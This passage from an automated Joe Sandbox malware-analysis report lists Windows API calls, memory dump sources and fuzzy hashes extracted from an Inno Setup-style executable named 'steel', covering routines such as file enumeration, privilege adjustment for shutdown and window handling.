                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                            • String ID: SeShutdownPrivilege
                                                                                            • API String ID: 107509674-3733053543
                                                                                            • Opcode ID: e41b2ce6836bec360355d7b24c2a1717b910cfd1a437749fc580c6f152555136
                                                                                            • Instruction ID: 23182b732e3c774e917f784577cc733395bd6f0e504c2650860deaf78f25ff04
                                                                                            • Opcode Fuzzy Hash: e41b2ce6836bec360355d7b24c2a1717b910cfd1a437749fc580c6f152555136
                                                                                            • Instruction Fuzzy Hash: CBF0C870294B41B9EA10A6718C17F3B21C89B40709F80083ABD05E90D3D7BDD40C4A2E
                                                                                            APIs
                                                                                            • GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045D191
                                                                                            • GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045D1A1
                                                                                            • GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045D1B1
                                                                                            • ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047F96F,00000000,0047F998), ref: 0045D1D6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$CryptVersion
                                                                                            • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                                                            • API String ID: 1951258720-508647305
                                                                                            • Opcode ID: dc81785b55ac876962535e0a2eb36b1dd730d24c9132c457d47d12d4ae2e21c2
                                                                                            • Instruction ID: d394b6b565b4a55a8c16e24b867b534ad65140704dc94b035c924c7661ebf9a3
                                                                                            • Opcode Fuzzy Hash: dc81785b55ac876962535e0a2eb36b1dd730d24c9132c457d47d12d4ae2e21c2
                                                                                            • Instruction Fuzzy Hash: A2F030B0D41700CAD318EFF6AC957263B96EB9830AF14C03BA414C51A2D7794454DF2C
                                                                                            APIs
                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000,004983C0,?,?,00000000,0049B628), ref: 004980FB
                                                                                            • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 0049817E
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,004981BA,?,00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000), ref: 00498196
                                                                                            • FindClose.KERNEL32(000000FF,004981C1,004981BA,?,00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000,004983C0), ref: 004981B4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileFind$AttributesCloseFirstNext
                                                                                            • String ID: isRS-$isRS-???.tmp
                                                                                            • API String ID: 134685335-3422211394
                                                                                            • Opcode ID: 4cf053d52b7de9e99314ef9443aa0be7ff49bfb1b7c6e14e5d4b85c56af708b1
                                                                                            • Instruction ID: fc6fb5a4e2302b333323d0d019d05182e8323e6fc1a1653111c694b95695a562
                                                                                            • Opcode Fuzzy Hash: 4cf053d52b7de9e99314ef9443aa0be7ff49bfb1b7c6e14e5d4b85c56af708b1
                                                                                            • Instruction Fuzzy Hash: E1316A719016186FCF10EF69CC42ADEBBBCDB45314F5044BBA808E3291DA3C9F458E58
                                                                                            APIs
                                                                                            • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457611
                                                                                            • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457638
                                                                                            • SetForegroundWindow.USER32(?), ref: 00457649
                                                                                            • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00457921,?,00000000,0045795D), ref: 0045790C
                                                                                            Strings
                                                                                            • Cannot evaluate variable because [Code] isn't running yet, xrefs: 0045778C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                                                            • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                                                            • API String ID: 2236967946-3182603685
                                                                                            • Opcode ID: 74e42c9c2b67fd5adc195c0662b506aaf6a0f02139eddaf5114ff9c1448628c8
                                                                                            • Instruction ID: 8776962154e21e4b1c8854f5ca4bcfaa90dd950cda3ad59ac2e2fede597431d6
                                                                                            • Opcode Fuzzy Hash: 74e42c9c2b67fd5adc195c0662b506aaf6a0f02139eddaf5114ff9c1448628c8
                                                                                            • Instruction Fuzzy Hash: 2B91D334608204DFEB15CF55E991F5ABBF5EB89704F2184BAE80497792C638AE04DB68
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455F4B), ref: 00455E3C
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00455E42
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                            • API String ID: 1646373207-3712701948
                                                                                            • Opcode ID: 409835b603e199d4170178d82c1615a1651ba94ec2cafac24c158ef3a131e909
                                                                                            • Instruction ID: d81c9a8c7c52065d28d66f53e81ce4f313aa74f068c2efe820cb9bfc493487ae
                                                                                            • Opcode Fuzzy Hash: 409835b603e199d4170178d82c1615a1651ba94ec2cafac24c158ef3a131e909
                                                                                            • Instruction Fuzzy Hash: B0418671A04649AFCF01EFA5C8929EEB7B8EF48305F504567F804F7292D67C5E098B68
                                                                                            APIs
                                                                                            • IsIconic.USER32(?), ref: 00417D0F
                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D2D
                                                                                            • GetWindowPlacement.USER32(?,0000002C), ref: 00417D63
                                                                                            • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D8A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Placement$Iconic
                                                                                            • String ID: ,
                                                                                            • API String ID: 568898626-3772416878
                                                                                            • Opcode ID: b31359e3e3f4af84bc1879df8bb30ee95a40fb82c66b770674b351632ff57231
                                                                                            • Instruction ID: e85585575f8c5a3e7823c55acc6b28d6d187d41511fbfc80546af44b70413e2d
                                                                                            • Opcode Fuzzy Hash: b31359e3e3f4af84bc1879df8bb30ee95a40fb82c66b770674b351632ff57231
                                                                                            • Instruction Fuzzy Hash: 4C2112716042089BDF10EF69D8C1AEA77B8AF48314F05456AFD18DF346D678DD84CBA8
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(00000001,00000000,0046433F), ref: 004641CD
                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 00464213
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,004642EC,?,00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 004642C8
                                                                                            • FindClose.KERNEL32(000000FF,004642F3,004642EC,?,00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 004642E6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$File$CloseErrorFirstModeNext
                                                                                            • String ID:
                                                                                            • API String ID: 4011626565-0
                                                                                            • Opcode ID: 1efd1e5842b6513eb7f92915edfbe8fc84401e145746a4d83abe9154eb57289a
                                                                                            • Instruction ID: 9d9184480f8630aada0b530c6bd54f2fc26159d28d851f3c8c43bf9f92f270d6
                                                                                            • Opcode Fuzzy Hash: 1efd1e5842b6513eb7f92915edfbe8fc84401e145746a4d83abe9154eb57289a
                                                                                            • Instruction Fuzzy Hash: 77418370A00A18DBCF10EFA5DC959DEB7B8EB88305F5044AAF804A7341E7789E448E59
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(00000001,00000000,00463E99), ref: 00463D0D
                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463D9C
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,00463E4E,?,00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463E2E
                                                                                            • FindClose.KERNEL32(000000FF,00463E55,00463E4E,?,00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463E48
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$File$CloseErrorFirstModeNext
                                                                                            • String ID:
                                                                                            • API String ID: 4011626565-0
                                                                                            • Opcode ID: 7f0cfbd2c28eb096c2c7b79ad6d01cc7699265dce8ba217153498c446e9855ae
                                                                                            • Instruction ID: 85e7d80bc36d7b3e80fea797042c039a90a2821ca6a16b1e557570abf42aa49f
                                                                                            • Opcode Fuzzy Hash: 7f0cfbd2c28eb096c2c7b79ad6d01cc7699265dce8ba217153498c446e9855ae
                                                                                            • Instruction Fuzzy Hash: 3A41B770A00A589FCB11EF65CC45ADEB7B8EB88705F4044BAF404A7381E67D9F48CE59
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E956
                                                                                            • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E981
                                                                                            • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E98E
                                                                                            • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E996
                                                                                            • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E99C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                                                            • String ID:
                                                                                            • API String ID: 1177325624-0
                                                                                            • Opcode ID: 00c40fca2cfdd97ba02e44e9efda7f487b55ec81a2bcf6d63bb4130569f45397
                                                                                            • Instruction ID: 661b18b1de4eb1238568a50ab540e77c3175952f9b14320adb6d96c9b056064d
                                                                                            • Opcode Fuzzy Hash: 00c40fca2cfdd97ba02e44e9efda7f487b55ec81a2bcf6d63bb4130569f45397
                                                                                            • Instruction Fuzzy Hash: 80F090B23A17207AF620B57A5C86F7F418CCB89B68F10423BBA04FF1D1D9A85D0555AD
                                                                                            APIs
                                                                                            • IsIconic.USER32(?), ref: 0048397A
                                                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 00483998
                                                                                            • ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049C0A8,00482E56,00482E8A,00000000,00482EAA,?,?,?,0049C0A8), ref: 004839BA
                                                                                            • ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049C0A8,00482E56,00482E8A,00000000,00482EAA,?,?,?,0049C0A8), ref: 004839CE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Show$IconicLong
                                                                                            • String ID:
                                                                                            • API String ID: 2754861897-0
                                                                                            • Opcode ID: 388bc32bc28a7c539796bab44a6ba9bad50612e2c7d9e5998850325d2fd9b569
                                                                                            • Instruction ID: 3cea9153c2b451a1fdc95e78a984a36fb28f479a74ffefb17a89e5a976076ef3
                                                                                            • Opcode Fuzzy Hash: 388bc32bc28a7c539796bab44a6ba9bad50612e2c7d9e5998850325d2fd9b569
                                                                                            • Instruction Fuzzy Hash: 160156B0705200ABEA00BF659CCBB5F22C55714745F44093BF4459B292CAADDA859B5C
                                                                                            APIs
                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00462824), ref: 004627A8
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,00462804,?,00000000,?,00000000,00462824), ref: 004627E4
                                                                                            • FindClose.KERNEL32(000000FF,0046280B,00462804,?,00000000,?,00000000,00462824), ref: 004627FE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                            • String ID:
                                                                                            • API String ID: 3541575487-0
                                                                                            • Opcode ID: b12316252c39c0105a03a3a2020ea099ca75c42189d8bae58c1ecd15a925fcd0
                                                                                            • Instruction ID: e6acefadc91213b77ea930f6be1f86c6134c8588622ee3d3acab995ed1c325b6
                                                                                            • Opcode Fuzzy Hash: b12316252c39c0105a03a3a2020ea099ca75c42189d8bae58c1ecd15a925fcd0
                                                                                            • Instruction Fuzzy Hash: 87210831904B08BECB11EB65CC41ACEB7ACDB49304F5084B7E808E32A1F6789E44CE69
                                                                                            APIs
                                                                                            • IsIconic.USER32(?), ref: 004241E4
                                                                                            • SetActiveWindow.USER32(?,?,?,0046CD53), ref: 004241F1
                                                                                              • Part of subcall function 0042364C: ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                              • Part of subcall function 00423B14: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,021225AC,0042420A,?,?,?,0046CD53), ref: 00423B4F
                                                                                            • SetFocus.USER32(00000000,?,?,?,0046CD53), ref: 0042421E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ActiveFocusIconicShow
                                                                                            • String ID:
                                                                                            • API String ID: 649377781-0
                                                                                            • Opcode ID: 1be179083055f96161d8b165ddd04f1e3bd56871e014c6a07f585ac04199aa1a
                                                                                            • Instruction ID: c953833529836f01456b8f788e47b4b7c36f7a841d6c6df07f57e62630513da6
                                                                                            • Opcode Fuzzy Hash: 1be179083055f96161d8b165ddd04f1e3bd56871e014c6a07f585ac04199aa1a
                                                                                            • Instruction Fuzzy Hash: 8CF030B170012097CB10BFAAA8C5B9676A8AB48344F5500BBBD05DF357CA7CDC018778
                                                                                            APIs
                                                                                            • IsIconic.USER32(?), ref: 00417D0F
                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D2D
                                                                                            • GetWindowPlacement.USER32(?,0000002C), ref: 00417D63
                                                                                            • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D8A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Placement$Iconic
                                                                                            • String ID:
                                                                                            • API String ID: 568898626-0
                                                                                            • Opcode ID: 19084698f29920acc68274fefc6d1be37826273bcf8ca1bc36e8902df026f6c2
                                                                                            • Instruction ID: d9358ea7cd183770b33139a8ac7b7a0a70302bd2c01e5fc8313c3e2814ac7f2c
                                                                                            • Opcode Fuzzy Hash: 19084698f29920acc68274fefc6d1be37826273bcf8ca1bc36e8902df026f6c2
                                                                                            • Instruction Fuzzy Hash: 33012C71204108ABDB10EE59D8C1EF673A8AF45724F154566FD19DF242D639ED8087A8
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CaptureIconic
                                                                                            • String ID:
                                                                                            • API String ID: 2277910766-0
                                                                                            • Opcode ID: c22591b8c3f2be6e3e416ff0957708157ed46c57fff49ed7de8fa542590db40d
                                                                                            • Instruction ID: 6cb7601519473143bf4e876ebf6758ccc8fc4fa751d6c6e0357a6193460a6b05
                                                                                            • Opcode Fuzzy Hash: c22591b8c3f2be6e3e416ff0957708157ed46c57fff49ed7de8fa542590db40d
                                                                                            • Instruction Fuzzy Hash: 0AF0A4723056425BD730AB2EC984AB762F69F84314B14403BE419CBFA1EB3CDCC08798
                                                                                            APIs
                                                                                            • IsIconic.USER32(?), ref: 0042419B
                                                                                              • Part of subcall function 00423A84: EnumWindows.USER32(00423A1C), ref: 00423AA8
                                                                                              • Part of subcall function 00423A84: GetWindow.USER32(?,00000003), ref: 00423ABD
                                                                                              • Part of subcall function 00423A84: GetWindowLongA.USER32(?,000000EC), ref: 00423ACC
                                                                                              • Part of subcall function 00423A84: SetWindowPos.USER32(00000000,\AB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241AB,?,?,00423D73), ref: 00423B02
                                                                                            • SetActiveWindow.USER32(?,?,?,00423D73,00000000,0042415C), ref: 004241AF
                                                                                              • Part of subcall function 0042364C: ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ActiveEnumIconicLongShowWindows
                                                                                            • String ID:
                                                                                            • API String ID: 2671590913-0
                                                                                            • Opcode ID: b2ff140757208bd7b7cc33ac29151dbeb423d1cdddd3b288bc041a56f1810338
                                                                                            • Instruction ID: ce5d4440ec1c13bcfda566247f28ea27228b22b89c70f7a48f218b5e8bc86154
                                                                                            • Opcode Fuzzy Hash: b2ff140757208bd7b7cc33ac29151dbeb423d1cdddd3b288bc041a56f1810338
                                                                                            • Instruction Fuzzy Hash: 55E01AA070011087DB10AFAADCC8B9632A9BB48304F55017ABD49CF35BD63CC8608724
APIs
• NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127D5), ref: 004127C3
Memory Dump Source
• Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_steel.jbxd
Similarity
• API ID: NtdllProc_Window
• String ID:
• API String ID: 4255912815-0
• Opcode ID: 120c9c179850e2d77f2b5158c289480559fb4752f9becda92d3f5c4f199058c9
• Instruction ID: 2c049f03cfb376e3baa0368465928f91904f6d03483072bf0e6cb5f6a46bccc5
• Opcode Fuzzy Hash: 120c9c179850e2d77f2b5158c289480559fb4752f9becda92d3f5c4f199058c9
• Instruction Fuzzy Hash: 4A5102357082048FD710DB6ADA80A9BF3E5EF98314B2082BBD814C77A1D7B8AD91C75D

APIs
• NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 00478C0E
Memory Dump Source
• Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
